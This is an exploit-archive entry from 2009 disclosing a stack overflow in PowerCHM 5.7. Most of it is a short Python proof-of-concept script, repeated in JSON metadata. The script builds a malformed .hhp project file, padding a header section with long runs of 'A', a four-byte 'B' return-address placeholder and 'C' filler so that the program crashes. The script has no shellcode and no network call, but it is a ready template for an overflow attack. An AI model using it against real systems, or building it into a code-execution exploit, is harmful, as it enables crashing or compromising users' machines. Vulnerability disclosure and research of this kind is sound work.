ID EXPLOITPACK:9B3F45BBB2C2EEEB1DF0C036D172840C
Type exploitpack
Reporter Encrypt3d.M!nd
Modified 2009-03-27T00:00:00
Description
PowerCHM 5.7 - .hhp Stack Overflow (PoC)
# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By:Encrypt3d.M!nd
#
# Orginally Discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#
header = (
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=aaaaaa.hhc\n"
"Index file=aaaaaa.hhk\n"
"Language=0x813 Dutch (Belgium)\n"
"Title=\n"
"Error log file=Errlog.txt\n"
"Default Window=main\n\n"
"[WINDOWS]\n"
'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n'
"[FILES]\n\n"
"[INFOTYPES]\n")
file=open('poc.hhp','w')
file.write(header+"\x41"*999+"\x42\x42\x42\x42"+"\x43"*500)
file.close()
# milw0rm.com [2009-03-27]
{"lastseen": "2020-04-01T19:04:43", "references": [], "description": "\nPowerCHM 5.7 - .hhp Stack Overflow (PoC)", "edition": 1, "reporter": "Encrypt3d.M!nd", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2009-03-27T00:00:00", "title": "PowerCHM 5.7 - .hhp Stack Overflow (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:43", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:43", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-03-27T00:00:00", "id": "EXPLOITPACK:9B3F45BBB2C2EEEB1DF0C036D172840C", "href": "", "viewCount": 1, "sourceData": "# exploit.py\n# PowerCHM 5.7 (hhp file) Stack overflow PoC\n# By:Encrypt3d.M!nd\n#\n# Orginally Discovered by:\n# Biks Security (http://security.biks.vn/?p=365)\n#\n\nheader = (\n\"[OPTIONS]\\n\"\n\"Compatibility=1.1 or later\\n\"\n\"Compiled file=bratax.chm\\n\"\n\"Contents file=aaaaaa.hhc\\n\"\n\"Index file=aaaaaa.hhk\\n\"\n\"Language=0x813 Dutch (Belgium)\\n\"\n\"Title=\\n\"\n\"Error log file=Errlog.txt\\n\"\n\"Default Window=main\\n\\n\"\n\"[WINDOWS]\\n\"\n'main=\"\",\"aaaaaa.hhc\",\"aaaaaa.hhk\",\"\",\"\",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\\n\\n'\n\"[FILES]\\n\\n\"\n\"[INFOTYPES]\\n\")\n\nfile=open('poc.hhp','w')\nfile.write(header+\"\\x41\"*999+\"\\x42\\x42\\x42\\x42\"+\"\\x43\"*500)\nfile.close()\n\n# milw0rm.com [2009-03-27]", "cvss": {"score": 0.0, "vector": "NONE"}}
{}